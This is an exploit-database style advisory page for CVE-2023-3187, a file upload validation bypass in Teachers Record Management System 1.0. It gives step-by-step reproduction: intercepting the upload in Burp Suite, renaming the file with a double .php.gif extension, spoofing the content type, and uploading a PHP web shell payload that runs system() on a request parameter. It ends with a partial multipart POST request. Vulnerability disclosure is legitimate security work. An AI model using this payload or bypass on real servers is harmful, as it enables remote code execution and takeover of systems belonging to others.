Teachers record management system 1.0 file upload type validation Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-06-13 |
Type : webapps |
Platform : php
This exploit / vulnerability Teachers record management system 1.0 file upload type validation is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187
===============================
STEPS_TO_REPRODUCE
===============================
1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”
Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
5. Change the **Content-type from “ image/png “ to “ image/gif “
6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
8. Below is the Burpsuite-POST Request for all the changes that I have made above
John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif